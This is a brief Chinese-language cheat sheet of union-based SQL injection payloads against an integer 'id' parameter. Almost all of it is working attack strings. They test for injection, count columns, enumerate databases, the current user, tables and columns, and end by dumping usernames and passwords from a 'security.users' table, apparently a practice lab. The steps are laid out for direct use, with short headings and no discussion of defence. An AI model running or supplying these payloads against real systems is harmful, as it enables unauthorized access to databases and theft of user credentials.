emmm

整形注入

id=1 and 1=1 %23
id=1 and 1=2 %23 //判断是否整形注入

id=1 order by 3
id=1 order by 4 //判断列数

id=1 and 1=2 union select 1,2,3 //判断显示位

查看所有数据库：
id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata %23
查看当前数据库：
id=1 and 1=2 union select 1,concat(database()) from information_schema.schemata %23
查看当前用户：
id=1 and 1=2 union select 1,concat(user()) from information_schema.schemata %23
....................

查看security库中所有数据表
id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' %23
查看security库中表users所有字段名
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' %23

查看password，username 这两个字段内容

id=1 and 1=2 union select 1,group_concat(username,0x23,password) from security.users %23